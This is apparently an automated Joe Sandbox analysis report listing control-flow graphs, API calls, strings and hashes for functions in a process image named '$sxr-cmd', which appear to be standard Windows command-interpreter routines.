                                                                                                            • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                            • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                            • API String ID: 2624720099-1920437939
                                                                                                            • Opcode ID: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                            • Instruction ID: f69763bcbedc112f790e98e1ca38e1568881f311504be40cba1942731088cfac
                                                                                                            • Opcode Fuzzy Hash: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                            • Instruction Fuzzy Hash: BBC1BF31E08E428AF794BB6494805B8EAA4BF49734FD44539DA2E77B91DE3DA05CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1117 7ff7137f823c-7ff7137f829b FindFirstFileExW 1118 7ff7137f82cd-7ff7137f82df 1117->1118 1119 7ff7137f829d-7ff7137f82a9 GetLastError 1117->1119 1123 7ff7137f8365-7ff7137f837b FindNextFileW 1118->1123 1124 7ff7137f82e5-7ff7137f82ee 1118->1124 1120 7ff7137f82af 1119->1120 1121 7ff7137f82b1-7ff7137f82cb 1120->1121 1125 7ff7137f83d0-7ff7137f83e5 FindClose 1123->1125 1126 7ff7137f837d-7ff7137f8380 1123->1126 1127 7ff7137f82f1-7ff7137f82f4 1124->1127 1125->1127 1126->1118 1128 7ff7137f8386 1126->1128 1129 7ff7137f82f6-7ff7137f8300 1127->1129 1130 7ff7137f8329-7ff7137f832b 1127->1130 1128->1119 1131 7ff7137f8332-7ff7137f8353 GetProcessHeap HeapAlloc 1129->1131 1132 7ff7137f8302-7ff7137f830e 1129->1132 1130->1120 1133 7ff7137f832d 1130->1133 1136 7ff7137f8356-7ff7137f8363 1131->1136 1134 7ff7137f8310-7ff7137f8313 1132->1134 1135 7ff7137f838b-7ff7137f83c2 GetProcessHeap HeapReAlloc 1132->1135 1133->1119 1137 7ff7137f8315-7ff7137f8323 1134->1137 1138 7ff7137f8327 1134->1138 1139 7ff7138050f8-7ff71380511e GetLastError FindClose 1135->1139 1140 7ff7137f83c8-7ff7137f83ce 1135->1140 1136->1134 1137->1138 1138->1130 1139->1121 1140->1136
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 873889042-0
                                                                                                            • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                            • Instruction ID: 86c3f44d629c278989eb3e1a5c6f7c0cf1062894d9af382eeb606c98ce3730dc
                                                                                                            • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                            • Instruction Fuzzy Hash: 0F512C36A09F42DAEB80AB11E454579FBA4FB4DBA1F848531DA1E63750CF3DE4688730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1141 7ff7137f2978-7ff7137f29b6 1142 7ff7137f29b9-7ff7137f29c1 1141->1142 1142->1142 1143 7ff7137f29c3-7ff7137f29c5 1142->1143 1144 7ff7137fe441 1143->1144 1145 7ff7137f29cb-7ff7137f29cf 1143->1145 1146 7ff7137f29d2-7ff7137f29da 1145->1146 1147 7ff7137f2a1e-7ff7137f2a3e FindFirstFileW 1146->1147 1148 7ff7137f29dc-7ff7137f29e1 1146->1148 1149 7ff7137fe435-7ff7137fe439 1147->1149 1150 7ff7137f2a44-7ff7137f2a5c FindClose 1147->1150 1148->1147 1151 7ff7137f29e3-7ff7137f29eb 1148->1151 1149->1144 1152 7ff7137f2ae3-7ff7137f2ae5 1150->1152 1153 7ff7137f2a62-7ff7137f2a6e 1150->1153 1151->1146 1154 7ff7137f29ed-7ff7137f2a1c call 7ff7137f8f80 1151->1154 1156 7ff7137f2aeb-7ff7137f2b10 _wcsnicmp 1152->1156 1157 7ff7137fe3f7-7ff7137fe3ff 1152->1157 1155 7ff7137f2a70-7ff7137f2a78 1153->1155 1155->1155 1160 7ff7137f2a7a-7ff7137f2a8d 1155->1160 1156->1153 1161 7ff7137f2b16-7ff7137fe3f1 _wcsicmp 1156->1161 1160->1144 1162 7ff7137f2a93-7ff7137f2a97 1160->1162 1161->1153 1161->1157 1164 7ff7137fe404-7ff7137fe407 1162->1164 1165 7ff7137f2a9d-7ff7137f2ade memmove call 7ff7137f13e0 1162->1165 1166 7ff7137fe40b-7ff7137fe413 1164->1166 1165->1151 1166->1166 1168 7ff7137fe415-7ff7137fe42b memmove 1166->1168 1168->1149
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                            • Instruction ID: a0b4fc34ed0fd4b68d660b3cc40cccd2292ea5914748868690995560c0b57100
                                                                                                            • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                            • Instruction Fuzzy Hash: D051E765B08E8285EAA0AF15A58427AE694FB58BB0FC45234DE7E276D0DF3CE44DC610
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

control_flow_graph 642 7ff7137f4d5c-7ff7137f4e4b InitializeCriticalSection call 7ff7137f58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7137f0580 call 7ff7137f4a14 call 7ff7137f4ad0 call 7ff7137f5554 GetCommandLineW 653 7ff7137f4e4d-7ff7137f4e54 642->653 653->653 654 7ff7137f4e56-7ff7137f4e61 653->654 655 7ff7137f51cf-7ff7137f51e3 call 7ff7137e3278 call 7ff7137f4c1c 654->655 656 7ff7137f4e67-7ff7137f4e7b call 7ff7137f2e44 654->656 662 7ff7137f4e81-7ff7137f4ec3 GetCommandLineW call 7ff7137f13e0 call 7ff7137eca40 656->662 663 7ff7137f51ba-7ff7137f51ce call 7ff7137e3278 call 7ff7137f4c1c 656->663 662->663 673 7ff7137f4ec9-7ff7137f4ee8 call 7ff7137f417c call 7ff7137f2394 662->673 663->655 677 7ff7137f4eed-7ff7137f4ef5 673->677 677->677 678 7ff7137f4ef7-7ff7137f4f1f call 7ff7137eaa54 677->678 681 7ff7137f4f95-7ff7137f4fee GetConsoleOutputCP GetCPInfo call 7ff7137f51ec GetProcessHeap HeapAlloc 678->681 682 7ff7137f4f21-7ff7137f4f30 678->682 687 7ff7137f5012-7ff7137f5018 681->687 688 7ff7137f4ff0-7ff7137f5006 GetConsoleTitleW 681->688 682->681 684 7ff7137f4f32-7ff7137f4f39 682->684 684->681 686 7ff7137f4f3b-7ff7137f4f77 call 7ff7137e3278 GetWindowsDirectoryW 684->686 697 7ff7137f51b1-7ff7137f51b9 call 7ff7137f4c1c 686->697 698 7ff7137f4f7d-7ff7137f4f90 call 7ff7137f3c24 686->698 691 7ff7137f507a-7ff7137f507e 687->691 692 7ff7137f501a-7ff7137f5024 call 7ff7137f3578 687->692 688->687 690 7ff7137f5008-7ff7137f500f 688->690 690->687 694 7ff7137f5080-7ff7137f50b3 call 7ff71380b89c call 7ff7137e586c call 7ff7137e3240 call 7ff7137f3448 691->694 695 7ff7137f50eb-7ff7137f5161 GetModuleHandleW GetProcAddress * 3 691->695 692->691 708 7ff7137f5026-7ff7137f5030 692->708 723 7ff7137f50b5-7ff7137f50d0 call 7ff7137f3448 * 2 694->723 724 7ff7137f50d2-7ff7137f50d7 call 7ff7137e3278 694->724 700 7ff7137f5163-7ff7137f5167 695->700 701 7ff7137f516f 695->701 697->663 698->681 700->701 706 7ff7137f5169-7ff7137f516d 700->706 707 7ff7137f5172-7ff7137f51af ??_V@YAXPEAX@Z call 7ff7137f8f80 701->707 706->701 706->707 712 7ff7137f5075 call 7ff71380cff0 708->712 713 7ff7137f5032-7ff7137f5059 GetStdHandle GetConsoleScreenBufferInfo 708->713 712->691 716 7ff7137f505b-7ff7137f5067 713->716 717 7ff7137f5069-7ff7137f5073 713->717 716->691 717->691 717->712 727 7ff7137f50dc-7ff7137f50e6 GlobalFree 723->727 724->727 727->695
                                                                                                            APIs
                                                                                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4D9A
                                                                                                              • Part of subcall function 00007FF7137F58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71380C6DB), ref: 00007FF7137F58EF
                                                                                                            • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4DBB
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F4DCA
                                                                                                            • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4DE0
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F4DEE
                                                                                                            • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4E04
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F0589
                                                                                                              • Part of subcall function 00007FF7137F0580: SetConsoleMode.KERNELBASE ref: 00007FF7137F059E
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F05AF
                                                                                                              • Part of subcall function 00007FF7137F0580: GetConsoleMode.KERNELBASE ref: 00007FF7137F05C5
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F05EF
                                                                                                              • Part of subcall function 00007FF7137F0580: GetConsoleMode.KERNELBASE ref: 00007FF7137F0605
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F0632
                                                                                                              • Part of subcall function 00007FF7137F0580: SetConsoleMode.KERNELBASE ref: 00007FF7137F0647
                                                                                                              • Part of subcall function 00007FF7137F4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A28
                                                                                                              • Part of subcall function 00007FF7137F4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A66
                                                                                                              • Part of subcall function 00007FF7137F4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A7D
                                                                                                              • Part of subcall function 00007FF7137F4A14: memmove.MSVCRT(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A9A
                                                                                                              • Part of subcall function 00007FF7137F4A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4AA2
                                                                                                              • Part of subcall function 00007FF7137F4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AD6
                                                                                                              • Part of subcall function 00007FF7137F4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AEF
                                                                                                              • Part of subcall function 00007FF7137F5554: RegOpenKeyExW.ADVAPI32(?,00000000,?,00000001,?,00007FF7137F4E35), ref: 00007FF7137F55DA
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F5623
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F5667
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F56BE
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F5702
                                                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4E35
                                                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4E81
                                                                                                            • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4F69
                                                                                                            • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4F95
                                                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FB0
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FC1
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FD8
                                                                                                            • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FF8
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F5037
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F504B
                                                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F50DF
                                                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F50F2
                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F510F
                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F5130
                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F514A
                                                                                                            • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7137F5175
                                                                                                              • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
                                                                                                              • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                              • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
                                                                                                              • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                              • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                              • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressHandleProcProcess$AllocCommandCriticalFreeInfoLineLockSectionShared$AcquireAllocateBufferCtrlDirectoryEnterEnvironmentFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenStringsTitleTypeWindowsmemmove
                                                                                                            • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                            • API String ID: 2533808960-3021193919
                                                                                                            • Opcode ID: e06c67148f7922823ef8cc05bd360387e5fff113248df6310448dc3bfb3b53b3
                                                                                                            • Instruction ID: 3f0fb2f69f1c4e73f8b0c247fbec0343185749a4620a871c2bfad394c9c4f576
                                                                                                            • Opcode Fuzzy Hash: e06c67148f7922823ef8cc05bd360387e5fff113248df6310448dc3bfb3b53b3
                                                                                                            • Instruction Fuzzy Hash: 6CC15D61A08E42DAEB84BB11E8401B9E7A4FF89BB0FC48134D91E27791DF7DE55D8230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

control_flow_graph 731 7ff7137f3c24-7ff7137f3c61 732 7ff7137fec5a-7ff7137fec5f 731->732 733 7ff7137f3c67-7ff7137f3c99 call 7ff7137eaf14 call 7ff7137eca40 731->733 732->733 735 7ff7137fec65-7ff7137fec6a 732->735 742 7ff7137f3c9f-7ff7137f3cb2 call 7ff7137eb900 733->742 743 7ff7137fec97-7ff7137feca1 call 7ff7137f855c 733->743 737 7ff7137f412e-7ff7137f415b call 7ff7137f8f80 735->737 742->743 748 7ff7137f3cb8-7ff7137f3cbc 742->748 749 7ff7137f3cbf-7ff7137f3cc7 748->749 749->749 750 7ff7137f3cc9-7ff7137f3ccd 749->750 751 7ff7137f3cd2-7ff7137f3cd8 750->751 752 7ff7137f3ce5-7ff7137f3d62 GetCurrentDirectoryW towupper iswalpha 751->752 753 7ff7137f3cda-7ff7137f3cdf 751->753 755 7ff7137f3fb8 752->755 756 7ff7137f3d68-7ff7137f3d6c 752->756 753->752 754 7ff7137f3faa-7ff7137f3fb3 753->754 754->751 758 7ff7137f3fc6-7ff7137f3fec GetLastError call 7ff7137f855c call 7ff7137fa5d6 755->758 756->755 757 7ff7137f3d72-7ff7137f3dcd towupper GetFullPathNameW 756->757 757->758 759 7ff7137f3dd3-7ff7137f3ddd 757->759 762 7ff7137f3ff1-7ff7137f4007 call 7ff7137f855c _local_unwind 758->762 761 7ff7137f3de3-7ff7137f3dfb 759->761 759->762 764 7ff7137f3e01-7ff7137f3e11 761->764 765 7ff7137f40fe-7ff7137f4119 call 7ff7137f855c _local_unwind 761->765 773 7ff7137f400c-7ff7137f4022 GetLastError 762->773 764->765 769 7ff7137f3e17-7ff7137f3e28 764->769 776 7ff7137f411a-7ff7137f4127 call 7ff7137eff70 call 7ff7137f855c 765->776 772 7ff7137f3e2c-7ff7137f3e34 769->772 772->772 777 7ff7137f3e36-7ff7137f3e3f 772->777 774 7ff7137f3e95-7ff7137f3e9c 773->774 775 7ff7137f4028-7ff7137f402b 773->775 780 7ff7137f3ecf-7ff7137f3ed3 774->780 781 7ff7137f3e9e-7ff7137f3ec2 call 7ff7137f2978 774->781 775->774 779 7ff7137f4031-7ff7137f4047 call 7ff7137f855c _local_unwind 775->779 801 7ff7137f412c 776->801 778 7ff7137f3e42-7ff7137f3e55 777->778 783 7ff7137f3e66-7ff7137f3e8f GetFileAttributesW 778->783 784 7ff7137f3e57-7ff7137f3e60 778->784 798 7ff7137f404c-7ff7137f4062 call 7ff7137f855c _local_unwind 779->798 787 7ff7137f3ed5-7ff7137f3ef7 GetFileAttributesW 780->787 788 7ff7137f3f08-7ff7137f3f0b 780->788 792 7ff7137f3ec7-7ff7137f3ec9 781->792 783->773 783->774 784->783 790 7ff7137f3f9d-7ff7137f3fa5 784->790 793 7ff7137f3efd-7ff7137f3f02 787->793 794 7ff7137f4067-7ff7137f4098 GetLastError call 7ff7137f855c _local_unwind 787->794 796 7ff7137f3f0d-7ff7137f3f11 788->796 797 7ff7137f3f1e-7ff7137f3f40 SetCurrentDirectoryW 788->797 790->778 792->780 792->798 793->788 800 7ff7137f409d-7ff7137f40b3 call 7ff7137f855c _local_unwind 793->800 794->800 802 7ff7137f3f46-7ff7137f3f62 call 7ff7137f498c 796->802 803 7ff7137f3f13-7ff7137f3f1c 796->803 797->802 804 7ff7137f40b8-7ff7137f40de GetLastError call 7ff7137f855c _local_unwind 797->804 798->794 800->804 801->737 810 7ff7137f3f67-7ff7137f3f69 802->810 803->797 803->802 814 7ff7137f40e3-7ff7137f40f9 call 7ff7137f855c _local_unwind 804->814 810->814 815 7ff7137f3f6f-7ff7137f3f98 call 7ff7137f417c 810->815 814->765 815->776
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
• String ID: :
• API String ID: 1809961153-336475711
• Opcode ID: 9d74a12bc874b56384ee2849c9ea8ed33252762c4bf133df5b2631275a7736a1
• Instruction ID: 31c86a57a4236d89e88fd78f693953c1471ae9b321943a3f05e3e80dc6d7ddab
• Opcode Fuzzy Hash: 9d74a12bc874b56384ee2849c9ea8ed33252762c4bf133df5b2631275a7736a1
• Instruction Fuzzy Hash: D8D15F2260CF8592EBA0AB15E4842B9F7A5FB88760F844235E95E537A4DF3CE54CC720
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 913 7ff7137f2394-7ff7137f2416 memset call 7ff7137eca40 916 7ff7137fe0d2-7ff7137fe0da call 7ff7137f4c1c 913->916 917 7ff7137f241c-7ff7137f2453 GetModuleFileNameW call 7ff7137f081c 913->917 922 7ff7137fe0db-7ff7137fe0ee call 7ff7137f498c 916->922 917->922 923 7ff7137f2459-7ff7137f2468 call 7ff7137f081c 917->923 928 7ff7137fe0f4-7ff7137fe107 call 7ff7137f498c 922->928 923->928 929 7ff7137f246e-7ff7137f247d call 7ff7137f081c 923->929 938 7ff7137fe10d-7ff7137fe123 928->938 934 7ff7137f2516-7ff7137f2524 call 7ff7137f498c 929->934 935 7ff7137f2483-7ff7137f2492 call 7ff7137f081c 929->935 941 7ff7137f2529 934->941 935->938 946 7ff7137f2498-7ff7137f24a7 call 7ff7137f081c 935->946 939 7ff7137fe125-7ff7137fe139 wcschr 938->939 940 7ff7137fe13f-7ff7137fe17a _wcsupr 938->940 939->940 943 7ff7137fe27c 939->943 944 7ff7137fe181-7ff7137fe199 wcsrchr 940->944 945 7ff7137fe17c-7ff7137fe17f 940->945 941->935 948 7ff7137fe283-7ff7137fe29b call 7ff7137f498c 943->948 947 7ff7137fe19c 944->947 945->947 955 7ff7137fe2a1-7ff7137fe2c3 _wcsicmp 946->955 956 7ff7137f24ad-7ff7137f24db call 7ff7137f3c24 946->956 950 7ff7137fe1a0-7ff7137fe1a7 947->950 948->955 950->950 953 7ff7137fe1a9-7ff7137fe1bb 950->953 957 7ff7137fe264-7ff7137fe277 call 7ff7137f1300 953->957 958 7ff7137fe1c1-7ff7137fe1e6 953->958 966 7ff7137f24dd-7ff7137f24e4 free 956->966 967 7ff7137f24e9-7ff7137f2514 call 7ff7137f8f80 956->967 957->943 961 7ff7137fe21a 958->961 962 7ff7137fe1e8-7ff7137fe1f1 958->962 968 7ff7137fe21d-7ff7137fe21f 961->968 964 7ff7137fe1f3-7ff7137fe1f6 962->964 965 7ff7137fe201-7ff7137fe210 962->965 964->965 969 7ff7137fe1f8-7ff7137fe1ff 964->969 965->961 970 7ff7137fe212-7ff7137fe218 965->970 966->967 968->948 972 7ff7137fe221-7ff7137fe228 968->972 969->964 969->965 970->968 974 7ff7137fe254-7ff7137fe262 972->974 975 7ff7137fe22a-7ff7137fe231 972->975 974->943 976 7ff7137fe234-7ff7137fe237 975->976 976->974 977 7ff7137fe239-7ff7137fe242 976->977 977->974 978 7ff7137fe244-7ff7137fe252 977->978 978->974 978->976
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$EnvironmentFileModuleNameVariable_wcsuprfreewcschr
• String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
• API String ID: 318233705-4197029667
